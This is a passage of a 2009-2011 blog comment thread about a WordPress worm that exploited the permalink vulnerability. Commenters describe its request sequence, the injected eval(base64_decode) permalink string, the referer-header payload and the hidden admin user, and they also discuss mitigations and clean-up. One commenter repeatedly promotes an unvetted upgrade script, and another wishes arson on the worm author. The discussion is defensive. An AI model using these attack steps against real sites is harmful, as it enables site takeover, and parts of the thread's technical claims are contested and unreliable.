  66. Posted September 7, 2009 at 11:02 am | Permalink

    This is all nice blabla, but what if upgrading IS NOT AN OPTION?
    No site I’ve come over so far does mention this.

    So it’s all nice and shiny, but still just useless blabla to me.

    cu, w0lf.

  67. sammo
    Posted September 7, 2009 at 11:45 am | Permalink

    @Joseph: Maybe this is part of something else then.

  68. Posted September 7, 2009 at 3:49 pm | Permalink

    Hi lorelle , thank you for this usefull tutorial ! is many time don’t see you ! u are ok ? god bless you and your family hugs :o)

    enore

  69. Posted September 7, 2009 at 9:06 pm | Permalink

    I noticed the problem with this hack at my blog yesterday when my permalink structure was changed. So on looking for reasons why I stumbled across this issues here. I used the information in the post and resource links to solve the problem by upgrading and erasing the additional admin account in my database.

    I appreciate the work that went into letting people know.

    As regards a lot of the comments chastising people who don’t upgrade I guess I would say I run a business and find it difficult to keep up with all the upgrades that comes at you using WordPress. Maybe one day I can afford a webmaster that knows what they’re doing and can be trusted – until then I’ll just have to keep on top of wordpress hacks.

  70. Adria Richards
    Posted September 7, 2009 at 10:06 pm | Permalink

    I’ve been a fan of Lorelle’s site and she certainly helped me get started in tweaking WordPress themes and learning the structure.

    [Removed Sales Pitch - Note: If you choose to promote WordPress products and services, please respect the trademark name.]

  71. Posted September 7, 2009 at 10:08 pm | Permalink

    Thanks for sharing this great information. Just updated mine.

  72. Posted September 7, 2009 at 11:11 pm | Permalink

    @Adria Richards: I don’t think it is appropriate to spread about your paid service here. Not every bloggers can afford that.

    Anyway, my fix & update wp script had successfully upgrade any old version to the latest wp. (The last few blogs i upgrade are 2.5.x ; )

    If anyone like to do a quick security check and upgrade your wp to the latest at the same time, check out:
    http://forums.mxhub.com/showthread.php?t=798

    Did i say mention it is FREE ? ;)

  73. Adria Richards
    Posted September 8, 2009 at 12:00 am | Permalink

    @Joseph,

    “Blogger” does not equal Ramen eating college student.

    Not all bloggers want to do the technical part of blogging and spend weeks figuring something out just like most people take their cars in for an oil change but some doe it themselves. Maybe you do your own oil changes.

    I’ve already posted videos at WordPress.tv about upgrading from WordPress 2.7 to 2.8. That’s free and many people have watched it and left comments.

    Upgrade WordPress 2.7 to 2.8 in CPanel.

  74. Posted September 8, 2009 at 12:06 am | Permalink

    @Adria Richards, at the end of the day, you still hope some noob will request for your service because they do not know how to do what you did in the video. FREE to watch the video but definitely not FREE to do all the work.

    My script simple:
    1. Upload the script
    2. Run it
    3. DONE!

    It backup your wp’s db and run all the check & upgrade automatically. Easy as 1 2 3!

  75. Posted September 8, 2009 at 12:46 am | Permalink

    @fwolf – As Lorelle said, you should upgrade or do your best to upgrade ASAP. There are ways though, if you really want to spend the time to do some work on securing your current version of WordPress. It’s NOT recommended, nor is it the best route to go about it. But like you said, not many sites cover what to do to plug your holes in the old versions. For doing something like you’re wanting, you’re looking at quite a bit of work done on the research of what security holes have been fixed since your version, then a type of “code” merger. If you’re unable to upgrade because you’ve got a highly customized version of WordPress, maybe now is the time to move over to building plugins that are separate from the WordPress interface. Contact me if you have any further questions as I can definitely point you in the right direction and help you with that process.

  76. sammo
    Posted September 8, 2009 at 2:16 am | Permalink

    @Lorelle: Thanks. I’ve done a clean install now on both installations and everything looks good. I checked back through my daily back-ups and logs etc and it looks like the new stuff was added on 05/09/09 on a 2.8.4 install, so I am not entirely sure that 2.8.4 is clear. My server techs can’t see how they got in either unfortunately :(

  77. Posted September 8, 2009 at 2:23 am | Permalink

    Might I add that I’m not a big fan of the “the latest version of software is secure” approach? 2.8.2 wasn’t secure, but an expert would have said that if you had that, you were. In fact, many many versions of WordPress have been found to be insecure in one way or another. That’s normal – and there may well be zero day exploits for 2.8.4

    The way it’s written, the platform it uses, and the market it’s targetted at makes it prone to weaknesses.

    Consequently a lot also depends on how your system is configured. Too many servers, both shared and dedicated, are poorly configured. Relying on WordPress alone for your security is foolish if you run a business critical blog (a hobbyist has less to worry about, I suppose) and so a common sense approach has to be taken. One must think of WordPress security as simply a front door to the server. If someone breaks down that front door, an alarm system makes sense, and a safe to put your valuables helps too.

    I’ve written about this in some depth and it’s not the be all and end all, but it’s a starting point to understanding the nature of web application security.

  78. Posted September 8, 2009 at 2:41 am | Permalink

    @Scott Kingsley Clark:
    Highly customized is probably on the themes/plugins part in ‘wp-content’ directory.

    As long as you did not have any additional or custom scripts in ‘wp-includes’ & ‘wp-admin’, a clean install & upgrade is safe.

  79. Posted September 8, 2009 at 2:43 am | Permalink

    Hi Lorelle, I know that it “shouldn’t” affect our development but I am a Sysadmin, and, as such, I don’t have the sign-off on upgrading. Thanks to Sarbanes-Oxley, pretty much anything involving any sort of risk of non-functioning websites involves a two-week lead time. This also tends to lead to very out of date software because nobody could be bothered going through the change control hell but that’s a separate issue.

    A response to my question at [0] suggests that the exploit requires user registration to be turned on. Can you confirm that we are safe from this particular worm if we turn user registration off ?

    Ideally, I’d like someone to post something like [1] for this worm but nobody seems to want to do that. The WordPress forums and all of the blogs talking about this only ever have two things to say: 1) Upgrade and 2) here’s how to clean your database up if you were too slow upgrading.

    I’m quite happy to do the analysis myself if someone who was infected would be willing to send me the relevant portion of their Apache access logs.

    [0] http://zedomax.com/blog/2009/09/06/wordpress-diy-how-to-check-for-spam-links-after-being-attacked-by-hackers/?dsq=16090662#comment-16090662
    [1] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

  80. Posted September 8, 2009 at 3:08 am | Permalink

    Turning registration off solves the problem according to [0] which seems like a reputable source. However, the very next post [1] claims that he was hacked even with registrations turned off. Since he is not sure which version he is running and didn’t see the broken permalink issue I suspect he got hit by a different worm that is using the same “hidden admin” payload.

    [0] http://wordpress.org/support/topic/297639/page/2#post-1203740
    [1] http://wordpress.org/support/topic/297639/page/3#post-1203788

  81. Posted September 8, 2009 at 3:23 am | Permalink

    @Dave: I can confirm that EVEN WITH registration turn off, the new admin user is still inserted into the database. (for my case, the nickname the hacker inserted is ‘JaredBoyce86′) . The attack is trace back to be started on 4th september 2009. This happen to one of my customers which prompted me to write up a script to fix the permalink & admin issue.

  82. Posted September 8, 2009 at 7:38 am | Permalink

    [Editor's Note: Before acting upon this information, please read this comment from Otto42. Also, for more updated information, please check the WordPress Support Forum.]

    I have found a lot more information on this now, mostly from the thread at [0] and I’ll sum up what I know.

    The attack happens on wp-admin//options-permalink.php (note the double slash) and is a POST request. I have not yet seen the POST variables for that request. Following this request there is a POST request for xmlrpc.php that includes a payload, base64 encoded in the referer field. The permalink exploit seems to enable the xmlrpc exploit. The xmlrpc exploit includes a file from a remote server, on a Chinese domain that adds a new admin user and hides it from displaying in WordPress using javascript and CSS.

    Prior to both of these requests, which constitute the actual attack, there are a couple of reconnaissance requests to determine your WordPress version by its capabilities and a couple of requests that register new users. Some reports show that there may be hours or even days between any of the steps of registering the users, exploiting the permalinks and adding the new admin user.

    I would guess, based on the bot logging in before running the exploit, that the permalink exploit requires a logged in (but not admin) user. This means that switching registrations off will not help if the bot has already registered a user on your blog. If your permalinks have been changed but you have no new admin user yet then changing the permalinks back will probably (I can’t confirm this) prevent the admin user being created. (However the bot can simply exploit the permalink again.)

    The IP addresses are from all over the place and the user-agents seem to be copied from legitimate browsers so neither of those can be used for filtering.

    Some things that can be used to make yourself safe from this worm:
    1. Use mod_rewrite to deny double slashes in URLs.
    2. Limit wp-admin to your IP address if you have a static one.
    2a. Limit wp-admin to your ISP’s IP range if you are on a dynamic IP.
    3. Put HTTP authentication on wp-admin.

    Some additional things that would prevent the second part of the attack:
    1. Turn off fopen_wrappers [1]
    2. Configure your firewall to not allow outbound HTTP requests.
    3. Remove xmlrpc.php

    All of these are good ideas to do anyway, even if you have already upgraded. Most of them have usability consequences (security is always a trade-off) but these are the ones that I consider to be a good trade-off.

    [0] http://wordpress.org/support/topic/307518/page/4?replies=16
    [1] http://uk2.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen

  83. Posted September 8, 2009 at 8:52 am | Permalink

    Dave: You’re essentially correct, but some of your suggestions are a bit off.

    1. The vulnerability being exploited is the one fixed in 2.8.3. Only 2.8.2 and earlier is vulnerable to this particular attack.

    2. A logged in user is indeed required to perform this attack, but one may not be necessary to exploit this vulnerability.

    3. The permalink change does enable the rest of the attack.

    4. The xmlrpc.php file is not vulnerable and has no security problem. It’s just the most handy way in. Removing this file does nothing for protection, as once the permalink change is made, any single post URL is equally vulnerable. Automated hacking mechanisms always use xmlrpc.php, just because they can.

    The only security measure that will actually work is, of course, to Upgrade WordPress to the latest version.

    If this is not immediately viable, then disabling user registration will stop this particular attack for now, but it is not a viable solution for most people, nor will it stop a determined hacker, as the vulnerability remains regardless. Patching earlier versions is not particularly easy, since these issues had to be patched twice in WordPress itself (in 2.8.1 and 2.8.3) as the problem was a complex one.

    If plugin compatibility is a problem preventing you from upgrading, then you need to be searching for alternative plugins that are well-maintained instead of relying on outdated and unsupported systems.

  84. Posted September 8, 2009 at 9:43 am | Permalink

    Thanks for the confirmation Otto,

    I’m not suggesting this instead of upgrading. I’m suggesting these if, as in my case, you can’t upgrade yet. Upgrading is still highly recommended by me (and everyone else. :-)

    Your points 2. and 4. are quite interesting and do change what I thought I knew about this. Having not seen it first-hand makes it difficult to “know” very much at all.

    We have never allowed user registrations so I’m not so worried about our installation as I once was. However, the thought that the exploit might still be possible even without a logged in user begins to trouble me again. I have implemented some of my own recommendations so I know this particular attack won’t affect our site, even if the exploit is possible without a registered user.

    As far as upgrading is concerned, it is our own development work, not plugins, that causes us to need to test everything before upgrading. I currently work with a team of 4 developers and in my last job (where we also used WordPress) we had a team of 70 developers. My role in these teams has always been to make sure we are not vulnerable by limiting and switching off services or features as necessary while the development and testing teams did their work.

  85. Posted September 8, 2009 at 10:54 am | Permalink

    Ahh. Well, okay. More info then.

    Basically, the exploit lets them change the permalink without having the proper authorization to do so. They change it into that eval(base64_decode(blah blah string you’ve seen elsewhere.

    This string is rather clever, in that it allows them to send a special HTTP header that executes as PHP code when the permalink string is processed. As you’ve seen, from there they use fopen to remotely load and execute their payload, which then downloads more, creates the admin users, etc.

    Quick patch if you want to live patch against this particular one:

    http://core.trac.wordpress.org/changeset/11761/trunk/wp-admin/options-permalink.php

    That doesn’t fix the overall problem, but will protect from this specific case.

    To see why it doesn’t fix the overall problem: http://core.trac.wordpress.org/changeset/11761/ There’s more patches along those lines in 2.8.1 and such.

  86. Falco Stellare
    Posted September 8, 2009 at 10:55 am | Permalink

    It would be nice to see someone set the worm author’s home on fire… Just to thank him for his nice contribution to the community… :-(

  87. K
    Posted September 8, 2009 at 12:53 pm | Permalink

    Given the amount of work needed to upgrade my WordPress I would rather take it down until the worm is identified than go through all the really nasty backwards-incompatiblity issues.

  88. Posted September 8, 2009 at 5:37 pm | Permalink

    @K : I have upgrade a customer’s blog (his is either 2.5 or 2.6.x ) with TONS of plugins and a custom theme. All of them are in wp-content which i did not touch during the upgrade using my fix_wp_update script.

    Simply follow the instruction over here. Upload the fix_wp_update script. It will do a security scan & remove any threat. Next, it will backup your wp’s and run the upgrade automatically. Take less than 5 min to complete.

    forums.mxhub.com/showthread.php?t=798

    Let me know if you run into any problem. I will look into this for you personally for FREE!!!!!!!

  89. @hmad
    Posted September 8, 2009 at 7:21 pm | Permalink

    no body secure any more in this world

  90. Posted September 8, 2009 at 10:23 pm | Permalink

    yea i upgraded my WP to 2.8.4 and even then my site got attacked lol

  91. Posted September 8, 2009 at 10:51 pm | Permalink

    @pankaj: What kind of ‘hacked’ symptoms did you encounter for your wp 2.8.4? When did you upgrade your blog?

  92. Daniel Sydnes
    Posted September 9, 2009 at 12:51 am | Permalink

    Three of our 40+ WordPress installs were hacked — one on 8/31 and two on 9/4. Here is what we discovered from during forensic analysis:

    – The worm that hit us is different than previous worms that attacked other web applications like Joomla.

    – The worm specifically targets older WordPress versions by leveraging search engines queries. For example:

    http://www.google.com/search?q=meta+generator+content+WordPress+2.7

    – The hack exploited vulnerabilities in wp-login.php to create a new administrator-level user.

    – It’s frightening how fast these attacks occurred. They used only FIVE http requests per exploited blog. Our intrusion detection systems would have detected and blocked SQL injections and dictionary attacks.

    – Our damage was limited to database changes. The file system was protected by file permissions set as advised in the “Hardening WordPress” article at – We followed all the advice on the “Hardening WordPress” Codex article.

    Some general observations from a WordPress fan:

    – FOUR security updates in FIVE weeks is an abysmal record. These vulnerabilities were in core files, not 3rd party libraries, themes, or plugins.

    – BY DEFAULT, WordPress, Plugins and Themes should never advertise versions in public-facing pages. This information is too easily exploited via search engine targeting. End users shouldn’t have to hack PHP code or install 3rd party security plugins to remove information that serves no purpose other than to assist hackers. Interestingly, WordPress.com removes version information on all their hosted code.

    – Every major software vendor recognizes that end users sometimes cannot immediately upgrade due to maintenance schedules, software conflicts, and regression testing. That’s where mitigation and work-arounds help most. Advice on htaccess, mod_rewrite, mod_security, iRules, or similar patches could significantly limit damage.

    – Perhaps the WordPress dashboard could warn about insecure file permissions, similar to the WP Super Cache plugin. Better yet, offer to correct the issues via FTP/SFTP.

    – Perhaps changes to admin settings (e.g., permalink structure, user registration, blog email address) could fire off an email notification, similar to what already occurs with account creation.

    – A scripted patch mechanism would be nice for those of us hosting dozens, hundreds, or even thousands of blog installations.

    – Differential patches — maybe just indicating modified files — would be nice too. If this is already available via subversion, a best practices article on the WordPress codex would be very helpful.

  93. Daniel Sydnes
    Posted September 9, 2009 at 1:12 am | Permalink

    @Otto42:You wrote:
    “If this is not immediately viable, then disabling user registration will stop this particular attack for now…”

    Two of our hacked blogs had user registration already disabled. The word ENABLED user registration. So that doesn’t appear to be a successful mitigation strategy.

    According to our logs, the worm made the following requests:
    “GET /xmlrpc.php HTTP/1.1″
    “GET /wp-login.php HTTP/1.1″
    “POST /wp-login.php HTTP/1.1″
    “GET /wp-admin/profile.php HTTP/1.1″
    “GET /wp-admin//options-permalink.php HTTP/1.1″

    The user-agent was faked, so it’s useless.

  94. Posted September 9, 2009 at 5:40 am | Permalink

    Thanks – have received a few emails about this from trusted sources, so I’m now going through and updating all of my blogs!

  95. Posted September 9, 2009 at 6:42 am | Permalink

    - The worm specifically targets older WordPress versions by leveraging search engines queries. For example:

    http://www.google.com/search?q=meta+generator+content+WordPress+2.7

    This is false. I have logs from WordPress 2.8.4 sites that received the same hack attempts you’re describing. They would not have shown up in such a search.

  96. Posted September 9, 2009 at 6:44 am | Permalink

    Interestingly, WordPress.com removes version information on all their hosted code.

    This is true, but not for the reasons given. WordPress.com is running the latest version of WordPress mu at pretty much all times. And when I say “latest”, I mean it, as they push the code from the SVN system to the live system something like 10 times a day. It’s the bleeding edge code, all the time.

  97. Posted September 9, 2009 at 11:44 am | Permalink

    Thanks to everyone for chiming in here but I need some serious help. I am not familiar with WordPress design. Our site has been hacked per the description above and my understanding is that I can not easily upgrade to the newest version of WP because of the custom theme that was installed when we started. I cant reach our developer and need a resource to get our site backed up, clean, and updated. If anyone can recommend a resource, I would greatly appreciate it. I am flying blind!! Will pay for services. We post every day and I am freaked out that we could be compromised here.

  98. David Gagnon
    Posted September 9, 2009 at 6:51 pm | Permalink

    My question could be silly, but I’m not a pro…

    Can you create a new user and set it as administrator, then log in with that new user and delete the “admin” user (default). Could you prevent the attack by doing that?

  99. Posted September 9, 2009 at 7:20 pm | Permalink

    @Emily: It should be safe to upgrade.
    The upgrade will not touch your ‘wp-content’ folder which contain your plugin & theme. So, it is safe.

    @David Gagnon: -_-” . No comment. :D lol.

  100. Posted September 10, 2009 at 12:25 am | Permalink

    I think you have put your time on writing this article that why is its great.

  101. Posted September 10, 2009 at 2:55 am | Permalink

    may it attack very old version? like 2.2 for istance? they where different for the DB version..

  102. Posted September 11, 2009 at 1:03 am | Permalink

    What about 2.9-rare? Is that branch safe?

  103. Posted September 12, 2009 at 10:15 am | Permalink

    Hi Lorelle, thanks for you post, its been interesting reading. I have/had this worm in all my blogs which I use as CMS on my domain. I reset the permalink structure, I have deleted the extra admin, and I have updated my wordpress to latest version. I have been symptom free for several days.

    Are my blogs now clean ? I am unsire if I need to do full new installs or if my actions so far have been enough. Your help would be appreciated.

    • Posted September 12, 2009 at 11:19 am | Permalink

      @Glenn Kilpatrick:Many are claiming they are free of this security attack by doing the surface things, but they aren’t. Seriously, if you have been infected, a full clean reinstall is best. Why risk it. Scoble did. Look what trouble he got in when they returned.

      @kovshenin: WordPress bleeding edge goodies are updated when past versions are updated. And remember, these pre-beta testing versions are not to be used by the timid nor inexpert.

  104. Posted September 13, 2009 at 1:44 am | Permalink

    Hello again, sorry to bother you yet again. I have just been speaking to my hosts about the attack and a fresh install. They are suggesting that even the database may be infected. Is this the case ? or will a clean install be enough to get this out ? Obviously I am now very concerned as theres years and years of posts in several of my blogs.

  105. Posted September 13, 2009 at 8:29 am | Permalink

    @Glenn Kilpatrick: I believe it’s been mentioned many times that a fresh database install is best, but that doesn’t mean you have to lose any of your posts at all. Just export them under “Tools->Admin” and import them again in the fresh database. Use a fresh copy of your theme and all plugins. You will have to set your widgets and plugins up again – but everything else will be fresh.

    In addition, if you just keep your old database (and don’t connect to it), you can connect with phpMyAdmin and get plugin settings, widget settings, or anything you forget like I’ve done for many clients.

  106. Posted September 13, 2009 at 10:57 pm | Permalink

    This post should be printed out, framed, placed next to the desk and read everyday in the morning. Thank you Lorelle.

  107. Posted September 14, 2009 at 1:04 am | Permalink

    With the exception of going out for lunch with the family. I spent 1 full day dealing with one blog. Admittedly I encountered a lot of problems that you wouldnt normally (Couldnt get the image uploader working on a new upload). So Lesson learnt. I think I could now do another cleaning process in less than 2 hours. So whats the best way to get notification of when a new wordpress release comes out ??

  108. Posted September 14, 2009 at 9:20 am | Permalink

    Thank you for this. I’m new to WordPress, and value your wealth of information.

  109. Posted September 14, 2009 at 12:07 pm | Permalink

    “So whats the best way to get notification of when a new wordpress release comes out ??”

    This is the issue. Lets be clear — WordPress folks have done an awesome job making it trivially easy to upgrade. What they need to do now is make it trivially easy to get *notified* that an upgrade is available.

    Specifically there needs to be an “Email admin when upgrade available” setting from within WordPress. Every time I’ve tried to sign up for the WordPress notification mailing list mentioned at WordPress.org, I never receive anything. And, frankly, it would be much better if all 15 of my installs e-mailed me individually so I don’t forget one.

    Yes, there’s now a plugin that will do this, but it needs to be built into WordPress and occasionally remind the admin that its there and can be turned on (i.e., option shows up initially and everytime there’s an upgrade a “would you like to be reminded by email?”)

    Some of us don’t log in to our admin side everyday, and there doesn’t seem to be a reliable way to get notification about upgrades any other way other than visiting WordPress.org

  110. Posted September 16, 2009 at 4:23 am | Permalink

    Hello again.

    Sorry to be back again asking questions but this is truning into quite a problem for me. So Im back asking for your thoughts and assistance.

    I have cleaned up 3 of my blogs. All seems well with no issues. Howevere today the members of my smf forum are reporting a virus on the forum. Now I know Lorelles site is not about smf forums. But how much of a coincidence is this problem ?? Is it at all possible that the wordpress hack has spread across my server and infected my smf installation. Is there anyway to know for definate if this is the case and can anyone advise on the way forward from here.

    • Posted September 16, 2009 at 11:36 am | Permalink

      Anything is possible, and this is not a WordPress-specific virus. Many other sites and platforms have been infected long before they were hitting WordPress, so your forums might have been infected as related or completely separate. Check with the smf forum folks NOW, not us nor WordPress. And good luck.

  111. nomi
    Posted September 18, 2009 at 12:45 am | Permalink

    To remove this problem always update new version.
    thank you

  112. absolutelybangkok
    Posted September 19, 2009 at 9:32 pm | Permalink

    I’d like to add though that the introduction of 2.8 was pretty messy.

    I always upgraded the first minute a new version appeared, but 2.8 was totally buggy and many plugins didn’t work anymore.

    So I rolled back to 2.7.1.

    Within a short time 2.8.1, then .2, then .3, and then .4 were introduced.

    Maybe, before launching a major upgrade next time, that version should be slightly less bug-free.

    I love WP and many thanks for all the work put into it, but I think many users had many problems when switching from 2.7 to 2.8

    • Posted September 20, 2009 at 12:05 am | Permalink

      Interesting. The majority of WordPress users did not have this issue. Clearly, you were using Plugins that weren’t up to standard with the current version, nor upgraded, though I do hope you checked first and upgraded the Plugins before upgrading, which would have resolved this issue.

      WordPress released those small updates in response to security issues, not really bug fixes, often before the security issues were public or acted upon, protecting WordPress users. WordPress is working on educating WordPress Plugin authors about standards and updating and maintaining quality Plugins, which was your issue, not so much the version upgrade itself.

  113. Posted September 20, 2009 at 12:20 am | Permalink

    @absolutelybangkok: yes. the quick version upgrade is probably a turn off. The code probably not polish off that well which spark off a number of bugs and security issues. As what lorelle mentioned, plugin is another backdoor which hacker can use to enter. Make sure you don’t install too many plugins … keep to a few & reliable one…

  114. absolutelybangkok
    Posted September 20, 2009 at 7:50 am | Permalink

    Thanks very much Lorelle & Joseph. Lesson learned – and I hope not too late!

    Deleted a hidden admin in DB and did a re-install of 2.8.4 – but 2 days after Viagra and Cialis links showed up again at the bottom of the pages …

    Did anyone have success with Joseph’s script?

  115. jtpratt
    Posted September 20, 2009 at 8:17 am | Permalink

    @absolutelybangkok I’ve removed this infectection for many new clients and the only way to get rid of it was by exporting all posts, pages, and comments in the existing site, and then creating a new wordpress database with a new db username and password, and importing all the pages posts and comments again to the new site.

    As a precaution I also started with a fresh copy of their theme at first, and fresh copies of every plugin they had. Then, at least all you have to do is re-setup your plugins, widgets, and blog settings (all of which can be copied from phpMyAdmin if you know how).

    In one particular instance I found that the infection and viagra and levitra links were coming from an infected version of Google XML Sitemap and not this permalink exploit.

    Once I rooted out the problems, I then stepped up security in the wp-config file, renamed the db tables from the default wp_ to something more obscure, and also created .htaccess files to lockdown both wp-admin and wp-content/uploads folders.

    In my opinion, the best defense against this and other XSS type attacks in SEO Egghead’s WordPress Firewall plugin – it stops exploits like this dead in their tracks (and emails you on each attack attempt).

  116. Posted September 23, 2009 at 4:21 pm | Permalink

    Wow, this is good stuff to know. Thank you so much for sharing. I love your blog by the way. I found it a long time ago and I have been sending my fellow WP junkies here every time I get a change. You really have a fantastic way of getting what you need to across. Thank you for being such an awesome blogger. :)

  117. Scott G.
    Posted September 24, 2009 at 1:35 pm | Permalink

    Spam attacks like this can be so deadly for a website and its owner, particularly if it is a main source of income or the base of a blog marketing strategy. And, with so many people wary of upgrades due to the technical issues they sometimes have, this will affect a lot of users. Hopefully, everyone heads your warning.

  118. Posted September 25, 2009 at 12:29 am | Permalink

    I have never update WordPress version after 2.7. Thank ypu so much for sharing this informative knowledge here. I wonder why i don’t have got this article before. I have decided to update WordPress 2.8.4 as soon as possible. I hope it will work best with me.

  119. Posted November 4, 2009 at 1:13 pm | Permalink

    Scary stuff!
    I’ve only just set up my first wordpress site and all I read about is worms and infected sites.
    Fortunately I’m using 2.8.4 and will upgrade to 2.8.5 once it appears on cpanel.

    I’ll take a look at making my password a bit more difficult and check out a few more of the security tips out there.

    • Posted November 6, 2009 at 1:27 am | Permalink

      Thank you for your question. Please check the WordPress Codex and WordPress Support Forums for answers on this.

  120. Posted November 6, 2009 at 8:26 pm | Permalink

    Hi,

    My friend’s blog already been hacked because of not update the WordPress into new version. Thanks for this great info

  121. Posted November 7, 2009 at 8:02 pm | Permalink

    Thank you! I’ve updated my wordpress and noe it works fine.

  122. richardtov
    Posted November 29, 2009 at 12:46 pm | Permalink

    but what you do when you are using a high costumized theme with custom tweaks and when u update to the last version everything will be f-up .

    • Posted December 2, 2009 at 1:35 pm | Permalink

      @richardtov: Updating does not touch your WordPress Theme. However, if you are customizing a Theme or using a custom Theme, always keep backups of everything, just in case harm is done to your Theme.

  123. Posted November 29, 2009 at 7:26 pm | Permalink

    Lucky for me using blogging at wordpress.com, it’s always auto update :)

  124. Posted December 2, 2009 at 6:40 pm | Permalink

    Don’t forget the most important line of defence .. make a current backup of your blog .. including the posts XML as well as your database.

  125. Sen. Sajonara
    Posted December 11, 2009 at 2:13 am | Permalink

    If anyone is really wondering what is happening here: It’s a code injection that has not been properly patched out since versions. After this mess with some 2.8.x hopping from version to version, the “right” patch finally made itself into the core code and the developers are taking more attention to remove dangerous code on it’s root.

    Always try to stay with the latest version. If plugins break find other users of that plugin so that you can help each other and you can help the plugins developer as well. If a plugin isn’t supported any longer try to find an alternative (I know there is a lot of fluctuation) and consider to actually support plugin developers because most often this is a single person who is doinig this in free time so it’s no wonder in the long run, that stuff get’s more or less unsupported. Sending some warm words of support and some bucks won’t hurt nobody.

    Each $ I pay for free source software I get back more then ten times. That easy it is. Find other users, select a plugin or project you like to support and help your bit. I’m pretty sure it will ever pay, just check if the plugin is GPLed which will enable other supporters and developers to help. Tell your plugins developer about the features wordpress.org has to offer to share their code (SVN access, plugin repository). This does help as well to find more developers for a plugin.

  126. Posted April 3, 2010 at 9:15 pm | Permalink

    I just got hit with this attack on several sites at once. It seems that if you use add on domains, it can find multiple blogs quickly as they are all on the same shared hosting account. I’m on the current WordPress version, so no one is immune at this point. My host (HostGator) mentioned a breach of my ftp recently which happened just a couple days before this happened, so that might have to do with it too.

  127. shock
    Posted April 19, 2010 at 3:14 pm | Permalink

    I’m the one who used to use the old version of WordPress because i would like to try new thing and i admit that i heard a lot of WordPress under attrack news. However, now i turn myself to new version and i found that there’s nothing to be worry.Absolutely agree with this article.

  128. Posted April 28, 2010 at 6:14 pm | Permalink

    Admin, I’m presently experiencing a serious attack on my blog which i’m finding very hard to get rid-off.Please,is there anyway, you can assist me get it fixed?

    • Posted May 3, 2010 at 9:23 pm | Permalink

      There are many web developers and helpful articles for resolving site hacks. Check in with the WordPress Support forum for help and advice or look to the WordPress job services for someone to help you. And always upgrade immediately. Good luck.

  129. Matt
    Posted May 12, 2010 at 5:49 am | Permalink

    I have been attacked four times in the past month. I updates all my blogs and reset the passwords as well.

    Pain in the f’n arse!

  130. Posted May 24, 2010 at 9:12 pm | Permalink

    Thanks for sharing this great information. Just updated mine.

  131. Posted May 27, 2010 at 6:01 pm | Permalink

    it seems alot of the sites hit are unfortunately being found by leaving the ‘powered by wordpress’ text. sites may be being found by this tag.

    also, on a couple of my sites that were hit i noticed not only a large chuck of javascript in the header and footer but in one instance a good ole fashioned iframe hit.

    i wish these b@st@rds would find something else to do. i am all for pointing out security holes – used to wear the black hat myself – but in my day we just posted our little “flag” and that was that..no harm no foul. this is costing hard working people hundreds of hours and possibly thousands of dollars of lost income.

  132. Posted June 12, 2010 at 6:04 am | Permalink

    I was sitting on my webpage, doing nothing, and I got a virus attack on my computer. So, I ran my Antivirus plugin on my blog to see what I turned up. The theme I use is the “Atahualpa” theme and I love it. I saw a few tags which include “eval” in the theme so I was going to erase them. (Naturally) I realized, however, that my code was indeed CODED that way. So I looked up the PHP term “eval” and sure enough it’s part of a loop. REPL is what it’s referred to. So, I reread the article and realized you said it was in permalinks. I’m very happy to see that that is all it turned out to be.. lol. Relieved really.

    • Posted July 6, 2010 at 9:31 pm | Permalink

      A virus attack on your home or office computer may be completely unrelated to virus attacks on your website, unless your computer is the web host server. Please treat them separately as they may not be related.

  133. Flinn
    Posted June 27, 2010 at 4:50 am | Permalink

    I am already so terrifies by this hacking stuff n on top of that my hosting is not helping me ,any help is much appreciated.

  134. Posted June 30, 2010 at 9:28 am | Permalink

    It seems that WordPress is indeed under attack but thankfully, I updated mine timely.

  135. Desentupidora
    Posted July 1, 2010 at 11:31 am | Permalink

    Lorelle, I`m really enjoying your blog about wordpress!

    I`m almost changing my mind about “Joomla! against WordPress” and installing a wordpress here, who knows something about the doubt… a place to users discuss!

    As soon as I have the address I paste it here!
    Can I?

  136. john
    Posted July 14, 2010 at 9:37 pm | Permalink

    my wordpress got hacked last month.

  137. Posted August 15, 2010 at 3:55 am | Permalink

    I was able to remove the extra admin user in the wpuser and wpusermeta tables through phpmyadmin and then upgrading. After, I had to reset my permalinks, but everything seems to have come out rosy

  138. Posted September 23, 2010 at 10:32 am | Permalink

    My blog was hit by iskorpitx earlier this week. My ISP claims to have “sealed the security leak”, but they wouldn’t give me any details. I have since upgraded as well.

  139. Posted September 25, 2010 at 3:48 am | Permalink

    I am usually hesitant about immediately upgrading any software because new stuff can introduce new bugs as well. How can I be sure the update is stable? I tend to prefer letting other people test and iron out all the issues. What can I do about these security issues? It seems the only thing I can do is just have daily backups.

    • Posted September 26, 2010 at 5:24 pm | Permalink

      @jeff: This was true years ago, it isn’t any more. Security updates aren’t for jokes. Upgrade immediately.

  140. Daniel
    Posted October 19, 2010 at 1:57 am | Permalink

    Great article about wordpress security. People have to understand that they always need to check potential vulnerabilites.

    And they also need to hide that they are using WordPress (for exemple, with wordpress meta in the header.php)

  141. Dan
    Posted November 24, 2010 at 9:00 am | Permalink

    Thanks for this post!

    Even though I have upgraded myself, I believe it’s important for people to know why they should put their fears aside and update.

    WordPress is much better than joomla to update :) I’m sure you agree…

    Dan

    • Posted November 24, 2010 at 11:10 am | Permalink

      I’m not sure I understand you. Old versions of WordPress as well as other publishing platforms that rely upon PHP and MySQL are constantly under attack. WordPress is not immune, nor is Joomla. As for updating, I believe that Joomla has improved considerably but I’m in no place to judge which is “better.” I do know that WordPress has worked very hard in the last few years to improve upgrades dramatically.

  142. Posted February 21, 2011 at 8:34 pm | Permalink

    Thanks for a great post. My blog has attacked by hacker. They pushed some php injection to my blog somehow though I couldn’t retrieve it myself. I got help from my Guru Jinnat Ul Hasan.

    Now I’m very much aware about my blogs security.

  143. Josh
    Posted February 22, 2011 at 12:48 am | Permalink

    Thanks for post. Had a client that came to me who was very reluctant to update their WordPress sites. Yet they said things were kind of off and funny recently, noticing weird links that go to “Chinese sites”. So I look into it and they hadn’t updated in over four years! So yeah, first thing I did was back it all up and updated everything, redesigned and optimized their site, and 301’d the rest. Huge difference now, it’s quickly climbing local Google results as well. Amazes me how many people just don’t update, especially now that things are near automatic, just seems ridiculous.

    • Posted February 22, 2011 at 6:06 pm | Permalink

      I’m sure in the process you checked thoroughly for viruses and other nasties. Upgrading will NOT fix these if it is infected.

  144. Posted March 9, 2011 at 11:04 pm | Permalink

    I previously still using wordpress 2.6 on my site, there is problem that I can’t doing editing of setting-reading.. if I upgrade it to the higher version, is the problem will solve?

    • Posted March 10, 2011 at 10:04 am | Permalink

